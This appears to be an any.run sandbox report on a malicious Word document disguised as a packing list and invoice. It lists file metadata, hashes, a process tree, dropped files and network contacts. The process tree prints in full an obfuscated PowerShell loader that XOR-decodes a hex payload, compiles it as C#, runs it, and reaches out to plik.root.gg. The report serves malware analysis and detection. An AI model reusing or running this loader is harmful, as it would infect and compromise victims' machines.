File name: | PACKING%20LIST%20OF%20INVOICE%20No%201616OC#3900446194556,%20INVOICE%20No%20#1617OC#3907778806155567899.doc |
Full analysis: | https://app.any.run/tasks/be406768-6899-476b-a51b-ae3720de2f47 |
Verdict: | Malicious activity |
Analysis date: | July 18, 2019, 13:50:25 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Title: rc734, Subject: q71e1, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Jul 18 08:55:00 2019, Last Saved Time/Date: Thu Jul 18 08:55:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
MD5: | AF18F392710B8844CBEA3A252FBA0789 |
SHA1: | EE1382CC5B9DB78C97EF5CED9BECFCAD845D83F4 |
SHA256: | 5C98254D7F7AFC0DEA5C13CEE3E203C7C42524FF5EBE35C6DB14D43C1B9D4E36 |
SSDEEP: | 12288:NFfDH2JexyhrAopDEPoqHw22rqxMaA58ewtfjH2JexYhrAoDDEPoq:rbcemAou/lAqOaA58eG7ceoAo8/ |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | rc734 |
---|---|
Subject: | q71e1 |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:07:18 07:55:00 |
ModifyDate: | 2019:07:18 07:55:00 |
Pages: | 1 |
Words: | - |
Characters: | 1 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Bytes: | 11000 |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 1 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | rc734 |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3844 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\9026ad35-3ea7-4c3d-8667-e302021e96ac.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3880 | powershell -WindowStyle Hidden function mca72 { param($d5863) $ce12ff7 = 'nc5469';$hf8f51 = ''; for ($i = 0; $i -lt $d5863.length; $i+=2) { $m44642 = [convert]::ToByte($d5863.Substring($i, 2), 16); $hf8f51 += [char]($m44642 -bxor $ce12ff7[($i / 2) % $ce12ff7.length]); } return $hf8f51; } $ufea4 = '1b105c5a51193d1a464053545516465d585e4e304c47425c034d6741584d070e501a7f571a06475b466a0b11435d555c1d5840475f570943664d454d0b0e1b705f58090d5a4742500d100e414550000415674f4a1a06581a7f765516465d585e4e304c47425c034d7b514202636945415455070015575a581d10154e535c0c004e6f7255022a5844594b1a4b175f534b00065907041b42265b4044403e0c5c5a42044c245040664b01007450524b0b1046161f644e1340565a500d434640574d070015514e4d0b115b147f571a334146164e0d5054010111270d4164424b4e0500520100421041465f5709435351575f5b021c0f6d7d020f7c5946561c171d165d5c1c0d5058050b4c4f1571584d1c1a655b5f571a4308141475010251785f5b1c02474d14103343454154550700154742581a0a561453411a06475a167000176540441918065405020f461041465f5709435d56535f5a50071d0d622a0f597d5b490111411c14520b115b515a0a5c41191473571a114c6459500017081660501c1740555a691c0c4151554d4c4a6814464c0c0f5c57164a1a02415d55190b1b415144574e015a5b5a190a505307015d462a5b40664d1c434455555b5c4f607d584d3e1747144c580c56040d0e154e165c5a42190902030c57080a4f155b434d4e165c5a421909550106555d594a0e6f7255022a5844594b1a4b177f534b0006590704170a0f59161a192b0d41464f69010a5b400b1b3c175979594f0b2e5059594b17411914655c1a2f5447427c1c115a460b5f0f0f46511f644e10415542500d43504c425c1c0d154259500a435f57520d5b00021c7f571a334146165f0d0651550215270d4164424b4e060452055d5757195d584d4e040406525c4758454154550700154742581a0a56145f571a435355575b0b4b1c4f7f571a334146165b5952510003004e5e154253585f57031c5b5a0f54071c140908535000000c0a520d0152095c5353161f10550a531c540e5f0701010f04532a5b40664d1c4d6f5144564718525b42564e1257510f5f5b060e497f571a33414616540b510456050f53145607570c594b5703075d5a560c185b5a0f54071c140b08535000000c0a550001570908535103010d5f56050150090c5204161f10550a531c5b5c5c5257070004532a5b40664d1c4d6f5144564718525b42564e1257510f5f5b060e4963700017654044191e5057020e5c5f5e1d617f571a3341461f0c55165c5a4219005606500e045e585c521e180a505307015d460e5006075b5d551944055b585b50051a0916570518594c1a435b01055d564a1c4f51561a0c1545545c570500510d442c1a41516d644e040707540d5318054c050842534d5250155e1b0c044b02270d4164424b4e090001525d532e544645510f0f1b755a5501007d735a560c02591c0510552e544645510f0f1b775949174b5206055b5a4f05185c0c5b075118051055095650020c0d541d5a534e4e2a5b40664d1c4b585104080c50031a6256270d410202114748054c06095f011c185c0c5b0751180510551257510f5f5b060f14615c0c20595d53571a43510255085a5e5b514119390657775a500b0d411c1f021d17475d585e4e120100025a5c5e705a40501c0c5b5953571a4d7251427f010f515144690f175d1c7357180a475b58540b0d411a65490b005c555a7f010f515144172f1345585f5a0f175c5b587d0f17541d1d1b323f5a57545a0d570c161d540d0202061e1b5a530502025d5b52171d0d5d58000400187d01145b5859580a255c5853110300540304114c530305010d5f57010003095d570400550d5b560d01500c5c570505070c0f565700040859530c0402080f560701500c5b53570055095a550301040d0b520c05540e57540703020d0c510105000c5c570401550f56570405010e57550202070e5f520107570f5f545700060c5a52030502095a530102030858525604520e0a530503050d5f530505050c0a56030153090c510705000f59525401050d5f5357161f151f570100550b47586546595a0b10466742581c177c5a50564e0207520e5c5b5e5b5141193e115a57534a1d304155444d270d535b1e485a57015704105533475b555c1d101b6742581c171d55045f5606001d0d4b0b17404658195e584844435b020a5614454d0f175c57164a1a115c5a51190300540304111d17475d585e4e190400015847184640445000041552035f595a0816585a5b57030d14021d17475d585e4e155055070d585e6640445000041b715b491a1a0e52594b460a5b40165053530e5d0a435f57025518750b0d52405e02074808061f420c1a4151164e0d50540101042d0c5b42534b1a4d615b74401a061d4e070d59021b67435b1d17475d585e460a19061f155f551c0f405c0f5201021d0446005d55441046145607570c59436b14500c08540c6f1e5041511c141319085653030f1722065b534251334a0e49445c1a16475a164f0b0204000002131e'; $ufea42 = mca72($ufea4); Add-Type -TypeDefinition $ufea42; [zeebc]::faabe(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1532 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\pt-mvjyi.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
3548 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES4CF.tmp" "c:\Users\admin\AppData\Local\Temp\CSC4CE.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3844 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRF732.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3880 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4QZQZ6XK39578HXJI46R.temp | — | |
MD5:— | SHA256:— | |||
3880 | powershell.exe | C:\Users\admin\AppData\Local\Temp\pt-mvjyi.0.cs | — | |
MD5:— | SHA256:— | |||
3880 | powershell.exe | C:\Users\admin\AppData\Local\Temp\pt-mvjyi.cmdline | — | |
MD5:— | SHA256:— | |||
1532 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSC4CE.tmp | — | |
MD5:— | SHA256:— | |||
1532 | csc.exe | C:\Users\admin\AppData\Local\Temp\pt-mvjyi.pdb | — | |
MD5:— | SHA256:— | |||
3548 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RES4CF.tmp | — | |
MD5:— | SHA256:— | |||
1532 | csc.exe | C:\Users\admin\AppData\Local\Temp\pt-mvjyi.dll | — | |
MD5:— | SHA256:— | |||
1532 | csc.exe | C:\Users\admin\AppData\Local\Temp\pt-mvjyi.out | — | |
MD5:— | SHA256:— | |||
3844 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1F398155.emf | — | |
MD5:— | SHA256:— |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3880 | powershell.exe | 37.187.19.227:443 | plik.root.gg | OVH SAS | FR | suspicious |
Domain | IP | Reputation |
---|---|---|
plik.root.gg |
| suspicious |
dns.msftncsi.com |
| shared |
Process | Message |
---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cppĒ |
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|